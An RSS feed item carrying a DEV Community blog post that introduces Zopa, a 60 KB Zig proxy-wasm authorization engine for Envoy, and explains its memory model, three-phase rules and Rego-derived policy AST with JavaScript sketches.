<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: kt</title>
    <description>The latest articles on DEV Community by kt (@kanywst).</description>
    <link>https://dev.to/kanywst</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3700180%2F04651b63-c6a1-4069-b356-a0f85c17e0bb.png</url>
      <title>DEV Community: kt</title>
      <link>https://dev.to/kanywst</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/kanywst"/>
    <language>en</language>
    <item>
      <title>Introducing Zopa: a 60 KB authorization engine for proxy-wasm, written in Zig</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Sun, 10 May 2026 07:37:50 +0000</pubDate>
      <link>https://dev.to/kanywst/introducing-zopa-a-60-kb-authorization-engine-for-proxy-wasm-written-in-zig-1l66</link>
      <guid>https://dev.to/kanywst/introducing-zopa-a-60-kb-authorization-engine-for-proxy-wasm-written-in-zig-1l66</guid>
      <description>&lt;p&gt;There are plenty of times you want to delegate "let this request through, or block it" to a wasm filter inside Envoy. API gateways, service mesh boundaries, L7 checkpoints. The default move is to use OPA's wasm build.&lt;/p&gt;

&lt;p&gt;The trouble is that OPA-as-wasm is heavy: the Go runtime, the Rego parser, and the evaluator are all in there. All you need at the edge is an allow/deny answer, yet you ship something many times the size of the evaluator alone. Cedar and Casbin don't ship official wasm builds (as of May 2026). The slot for "drop-in proxy-wasm authorization filter" is empty.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/0-draft/zopa" rel="noopener noreferrer"&gt;zopa&lt;/a&gt; is what I built to fill that slot. A Zig &lt;code&gt;wasm32-freestanding&lt;/code&gt; binary, ~60 KB at release. No GC; memory turns over on a per-request arena. It runs on any host that implements proxy-wasm 0.2.1 (Envoy / wasmtime / wamr / v8).&lt;/p&gt;

&lt;h2&gt;
  
  
  Big picture
&lt;/h2&gt;

&lt;p&gt;Zopa assumes you separate &lt;strong&gt;where you write policy&lt;/strong&gt; from &lt;strong&gt;where you evaluate it&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5tld6tadgzo8cwx4f6l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe5tld6tadgzo8cwx4f6l.png" alt="zopa" width="514" height="748"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Policy authors write rules in Rego (OPA's policy language; a declarative DSL in the Datalog family). The CI converts that to AST (Abstract Syntax Tree) JSON. At Envoy startup the AST is handed to the wasm module as plugin config; on each incoming request, zopa evaluates and returns 1 or 0.&lt;/p&gt;

&lt;p&gt;There's exactly one design call here: &lt;strong&gt;don't ship a language compiler inside the wasm module&lt;/strong&gt;. OPA wasm is large because the Rego parser and evaluator are bundled together. Zopa pushes the parser out of the wasm (into a CI job) and keeps the wasm module focused on evaluation. That alone shrinks the binary by orders of magnitude.&lt;/p&gt;
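
&lt;p&gt;The CI step itself isn't shown here, but as a minimal sketch of the idea, a job could sanity-check the generated AST JSON before bundling it into the Envoy config (hypothetical helper, not part of zopa; field names follow the AST examples later in this post):&lt;/p&gt;

```javascript
// Hypothetical CI-side sanity check for the generated policy AST.
// Catches a malformed conversion before it reaches Envoy.
function validatePolicyAst(ast) {
  if (ast === null || typeof ast !== 'object') return 'not an object';
  if (ast.type !== 'module') return 'root must be a module node';
  if (!Array.isArray(ast.rules)) return 'module needs a rules array';
  for (const rule of ast.rules) {
    if (rule.type !== 'rule') return 'rules[] entries must be rule nodes';
    if (typeof rule.name !== 'string') return 'every rule needs a name';
  }
  return 'ok';
}

const sample = { type: 'module', rules: [{ type: 'rule', name: 'allow' }] };
console.log(validatePolicyAst(sample)); // ok
```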

&lt;h2&gt;
  
  
  proxy-wasm refresher
&lt;/h2&gt;

&lt;p&gt;proxy-wasm is the ABI spec for "filters in wasm" used by Envoy and friends. Envoy is the best-known host, but anything embedding wasmtime / wamr / v8 can run it.&lt;/p&gt;

&lt;p&gt;Three points cover the host/wasm relationship:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The host calls into wasm exports at request milestones (&lt;code&gt;proxy_on_request_headers&lt;/code&gt; etc.).&lt;/li&gt;
&lt;li&gt;The wasm pulls header values back through host imports (&lt;code&gt;proxy_get_header_map_value&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Allow does nothing (Envoy continues). Deny asks the host to call &lt;code&gt;proxy_send_local_response(403)&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Zopa implements proxy-wasm 0.2.1. Spec: &lt;a href="https://github.com/proxy-wasm/spec" rel="noopener noreferrer"&gt;proxy-wasm/spec&lt;/a&gt;.&lt;/p&gt;
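
&lt;p&gt;As a toy model of those three points (plain JS, not a real proxy-wasm host; the names only mirror the ABI calls above):&lt;/p&gt;

```javascript
// Toy model of the host/wasm call order described above. This is NOT a
// proxy-wasm implementation, just the handshake in miniature.
function makeHost(filter) {
  return {
    handle(request) {
      // 1. the host calls into the wasm export at the request milestone
      const action = filter.proxy_on_request_headers(request);
      // 3. allow means "do nothing, continue"; deny becomes a local 403
      return action === 'Continue'
        ? { status: 200, from: 'upstream' }
        : { status: 403, from: 'filter' };
    },
  };
}

const filter = {
  proxy_on_request_headers(request) {
    // 2. a real filter would pull headers via proxy_get_header_map_value
    return request.headers['x-role'] === 'admin' ? 'Continue' : 'Deny';
  },
};

console.log(makeHost(filter).handle({ headers: { 'x-role': 'admin' } }).status); // 200
```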

&lt;h2&gt;
  
  
  Why it fits in 60 KB
&lt;/h2&gt;

&lt;p&gt;The build:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;zig build &lt;span class="nt"&gt;--release&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;small
&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-lh&lt;/span&gt; zig-out/bin/zopa.wasm
&lt;span class="c"&gt;# -rw-r--r-- 1 you staff 60K  zopa.wasm&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three things drive the size:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;wasm32-freestanding&lt;/code&gt; target.&lt;/strong&gt; No WASI (the wasm syscall spec). No OS, no syscalls, only a thin slice of stdlib. &lt;code&gt;freestanding&lt;/code&gt; drops every file I/O / network stub.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No GC.&lt;/strong&gt; Zig has no garbage collector; memory is hand-managed through explicit allocators, closer to C than to a managed runtime. The GC code and its management metadata simply don't exist in the binary.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero deps.&lt;/strong&gt; Nothing outside Zig stdlib. The JSON parser is hand-rolled (recursive descent) in &lt;code&gt;src/json.zig&lt;/code&gt;, surrogate-pair handling included, in a few hundred lines.&lt;/li&gt;
&lt;/ol&gt;
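
&lt;p&gt;Not zopa's &lt;code&gt;src/json.zig&lt;/code&gt;, but the same recursive-descent shape in miniature (a JS sketch over a JSON subset; the real parser additionally handles string escapes and surrogate pairs):&lt;/p&gt;

```javascript
// Recursive descent in miniature: one function per grammar production,
// each consuming characters from a shared cursor. Subset only: strings
// without escapes, integers, booleans, null, arrays, objects.
function parse(src) {
  let i = 0;
  const peek = () => src[i];
  const skipWs = () => { while (' \n\r\t'.includes(src[i])) i += 1; };
  const expect = (ch) => {
    if (src[i] !== ch) throw new Error('expected ' + ch + ' at ' + i);
    i += 1;
  };

  function value() {
    skipWs();
    const c = peek();
    if (c === '{') return object();
    if (c === '[') return array();
    if (c === '"') return string();
    if (src.startsWith('true', i)) { i += 4; return true; }
    if (src.startsWith('false', i)) { i += 5; return false; }
    if (src.startsWith('null', i)) { i += 4; return null; }
    return number();
  }
  function string() {
    expect('"');
    let out = '';
    while (src[i] !== '"') { out += src[i]; i += 1; }
    i += 1; // closing quote
    return out;
  }
  function number() {
    let out = '';
    if (src[i] === '-') { out = '-'; i += 1; }
    while ('0123456789'.includes(src[i])) { out += src[i]; i += 1; }
    return Number(out);
  }
  function array() {
    expect('[');
    const out = [];
    skipWs();
    if (peek() === ']') { i += 1; return out; }
    for (;;) {
      out.push(value());
      skipWs();
      if (peek() === ']') { i += 1; return out; }
      expect(',');
    }
  }
  function object() {
    expect('{');
    const out = {};
    skipWs();
    if (peek() === '}') { i += 1; return out; }
    for (;;) {
      skipWs();
      const key = string();
      skipWs();
      expect(':');
      out[key] = value();
      skipWs();
      if (peek() === '}') { i += 1; return out; }
      expect(',');
    }
  }
  return value();
}

console.log(parse('{"rules": [1, 2, {"name": "allow"}]}').rules[2].name); // allow
```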

&lt;p&gt;OPA's wasm is large because it carries the Go runtime (with GC), the Rego parser, and the evaluator. Zopa took the opposite call on every point. The result is 60 KB.&lt;/p&gt;

&lt;h2&gt;
  
  
  Memory model
&lt;/h2&gt;

&lt;p&gt;Zopa's heart is the memory layout. Two allocators, with different lifetimes and roles.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fviuwqw6lqy5ld5c3z2e5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fviuwqw6lqy5ld5c3z2e5.png" alt="memory model" width="800" height="401"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;host_allocator&lt;/code&gt; is Zig stdlib's &lt;code&gt;std.heap.wasm_allocator&lt;/code&gt;, a freelist-style allocator. It backs every buffer that crosses the host boundary. Lifetime: the whole module.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;request_arena&lt;/code&gt; is &lt;code&gt;std.heap.ArenaAllocator&lt;/code&gt;. Per-request scratch space. We call &lt;code&gt;reset(.retain_capacity)&lt;/code&gt; at the end of &lt;code&gt;evaluate()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;An arena means "alloc as much as you want; everything goes away at the end". No individual &lt;code&gt;free&lt;/code&gt; calls. With &lt;code&gt;retain_capacity&lt;/code&gt;, the wasm linear memory pages aren't returned, so the next request reuses the existing capacity.&lt;/p&gt;

&lt;p&gt;Net effect: after warmup, &lt;code&gt;memory.grow&lt;/code&gt; (the wasm heap-grow instruction) stops firing. Throughput goes up and memory stays roughly flat; that steady state is exactly what the arena buys.&lt;/p&gt;

&lt;p&gt;The single rule that ties it together: &lt;strong&gt;a pointer minted by one allocator must only be released by the matching free path&lt;/strong&gt;. The proxy-wasm shim returns host-malloc'd buffers via the host's free; the evaluator never calls &lt;code&gt;free&lt;/code&gt; directly and instead leans on the arena reset.&lt;/p&gt;
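
&lt;p&gt;A bump-arena sketch in JS shows the mechanics (a stand-in for Zig's &lt;code&gt;ArenaAllocator&lt;/code&gt;, not zopa's code; the data copy on grow is omitted since the arena is reset anyway):&lt;/p&gt;

```javascript
// Bump arena in miniature: alloc() is a pointer bump, reset() forgets
// everything at once but keeps the backing capacity, the JS analogue of
// ArenaAllocator.reset(.retain_capacity).
class Arena {
  constructor(capacity) {
    this.buf = new ArrayBuffer(capacity);
    this.offset = 0;
    this.grows = 0; // stands in for memory.grow events
  }
  alloc(size) {
    if (this.offset + size > this.buf.byteLength) {
      this.grows += 1;
      // real code would copy live data; skipped here since we reset anyway
      this.buf = new ArrayBuffer((this.offset + size) * 2);
    }
    const ptr = this.offset;
    this.offset += size;
    return new Uint8Array(this.buf, ptr, size);
  }
  reset() {
    this.offset = 0; // no individual frees; capacity is retained
  }
}

const arena = new Arena(64);
for (let request = 0; request !== 3; request += 1) {
  arena.alloc(100); // per-request scratch
  arena.reset();    // end of evaluate(): everything goes away
}
console.log(arena.grows); // 1 -- grew once on warmup, then reused capacity
```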

&lt;h2&gt;
  
  
  Three-phase target rules
&lt;/h2&gt;

&lt;p&gt;Zopa makes the decision independently in three HTTP phases. Each phase is bound to &lt;strong&gt;a different target rule name&lt;/strong&gt;; if your policy contains a rule with that name, the phase fires; if not, the phase passes through silently.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Phase&lt;/th&gt;
&lt;th&gt;Target rule&lt;/th&gt;
&lt;th&gt;Input shape&lt;/th&gt;
&lt;th&gt;On deny&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;proxy_on_request_headers&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;allow&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{method, path, headers}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;403&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;proxy_on_request_body&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;allow_body&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{body, body_raw}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;403 + Pause&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;proxy_on_response_headers&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;allow_response&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{response: {status, headers}}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;503&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The key point: a policy with only an &lt;code&gt;allow&lt;/code&gt; rule sails past the body and response phases untouched. At configure time we parse the policy JSON and remember whether &lt;code&gt;allow_body&lt;/code&gt; / &lt;code&gt;allow_response&lt;/code&gt; rules exist as bools; if they don't, the matching callbacks return &lt;code&gt;Continue&lt;/code&gt; directly.&lt;/p&gt;
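
&lt;p&gt;Sketched in JS (the two bools are a paraphrase of that configure-time check, not zopa's actual code):&lt;/p&gt;

```javascript
// Configure-time scan: remember once whether each phase's target rule
// exists, so the per-request callbacks can return Continue without
// evaluating anything.
function configure(policy) {
  const names = new Set(policy.rules.map((r) => r.name));
  return {
    hasBody: names.has('allow_body'),
    hasResponse: names.has('allow_response'),
  };
}

function onRequestBody(flags, evaluate) {
  if (!flags.hasBody) return 'Continue'; // phase passes through silently
  return evaluate() === 1 ? 'Continue' : 'Deny403AndPause';
}

const flags = configure({
  rules: [{ type: 'rule', name: 'allow' }], // headers-only policy
});
console.log(onRequestBody(flags, () => 0)); // Continue
```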

&lt;h2&gt;
  
  
  What happens during one request
&lt;/h2&gt;

&lt;p&gt;When Envoy hands a single request to zopa, this is the timeline inside.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2F0-draft%2Fdev.to%2Fmain%2Farticles%2Fassets%2Fintroducing-zopa%2Frequest-flow.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fraw.githubusercontent.com%2F0-draft%2Fdev.to%2Fmain%2Farticles%2Fassets%2Fintroducing-zopa%2Frequest-flow.png" alt="request flow" width="800" height="1798"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Three takeaways:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The policy AST is &lt;strong&gt;handed to us once at startup&lt;/strong&gt; and copied into &lt;code&gt;host_allocator&lt;/code&gt;. We don't re-receive it per request.&lt;/li&gt;
&lt;li&gt;Every phase ends with &lt;code&gt;arena.reset&lt;/code&gt;. Zopa carries no data across phase or request boundaries.&lt;/li&gt;
&lt;li&gt;The body and response phases only run eval &lt;strong&gt;when the matching rule exists&lt;/strong&gt;. The policy opts each phase in by writing a rule with that name.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;evaluate()&lt;/code&gt; returns a plain &lt;code&gt;i32&lt;/code&gt;:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Return&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;allow. The target rule fired with a truthy value.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;0&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;deny. No rule fired and no truthy default rule was present.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-1&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;error. Parse failure, unknown node, recursion cap, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The proxy-wasm shim treats &lt;code&gt;-1&lt;/code&gt; the same as deny: broken policies fail closed.&lt;/p&gt;
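
&lt;p&gt;In sketch form (JS, illustrative names only):&lt;/p&gt;

```javascript
// How the shim folds evaluate()'s i32 into an action: -1 (error) is
// handled exactly like 0 (deny), so a broken policy blocks by default.
function actionFor(result, denyStatus) {
  return result === 1 ? 'Continue' : 'LocalResponse ' + denyStatus;
}

console.log(actionFor(1, 403));  // Continue
console.log(actionFor(0, 403));  // LocalResponse 403
console.log(actionFor(-1, 403)); // LocalResponse 403
```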

&lt;h2&gt;
  
  
  Policy AST
&lt;/h2&gt;

&lt;p&gt;Zopa's input isn't Rego source; it's AST-shaped JSON. The supported nodes mirror a subset of Rego.&lt;/p&gt;

&lt;p&gt;"&lt;code&gt;role&lt;/code&gt; equals &lt;code&gt;admin&lt;/code&gt; → allow" looks like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"module"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"rules"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"rule"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"allow"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"default"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"rule"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"allow"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"body"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"eq"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"left"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"ref"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"path"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"input"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"user"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"role"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"right"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"admin"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The evaluation rule: OR together every rule whose &lt;code&gt;name&lt;/code&gt; is &lt;code&gt;allow&lt;/code&gt;. If any rule's body holds, &lt;code&gt;allow=true&lt;/code&gt;. A &lt;code&gt;default=true&lt;/code&gt; rule's value is the fallback for when nothing else fires.&lt;/p&gt;
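
&lt;p&gt;Paraphrased as a JS sketch (truthiness details simplified; the &lt;code&gt;bodyHolds&lt;/code&gt; callback stands in for expression evaluation):&lt;/p&gt;

```javascript
// "OR every rule named `allow`": any non-default rule whose body holds
// wins; a default rule's value is the fallback when nothing fires.
function evalRuleSet(rules, name, bodyHolds) {
  let fallback = false;
  for (const rule of rules) {
    if (rule.name !== name) continue;
    if (rule.default) { fallback = Boolean(rule.value); continue; }
    if (rule.body.every(bodyHolds)) return true; // body exprs are ANDed
  }
  return fallback;
}

const rules = [
  { name: 'allow', default: true, value: false },
  { name: 'allow', body: [{ role: 'admin' }] },
];
const input = { role: 'viewer' };
console.log(evalRuleSet(rules, 'allow', (expr) => expr.role === input.role)); // false
```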

&lt;p&gt;Supported node types:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Node&lt;/th&gt;
&lt;th&gt;Use&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;value&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Literal (any JSON value)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;ref&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Path lookup, e.g. walking &lt;code&gt;input.user.role&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;compare&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Binary compare. &lt;code&gt;eq&lt;/code&gt; / &lt;code&gt;neq&lt;/code&gt; / &lt;code&gt;lt&lt;/code&gt; / &lt;code&gt;lte&lt;/code&gt; / &lt;code&gt;gt&lt;/code&gt; / &lt;code&gt;gte&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;not&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Logical negation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;set&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Set literal&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;some&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Existential quantifier: "some element x makes body true"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;every&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Universal quantifier: "every element x makes body true"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;call&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Builtin function call.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;module&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A set of rules. Optional &lt;code&gt;package&lt;/code&gt; field carries the package name.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;modules&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Module bundle: multiple packages co-resident in a single VM.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;rule&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A single rule with &lt;code&gt;body&lt;/code&gt; (AND) and &lt;code&gt;value&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

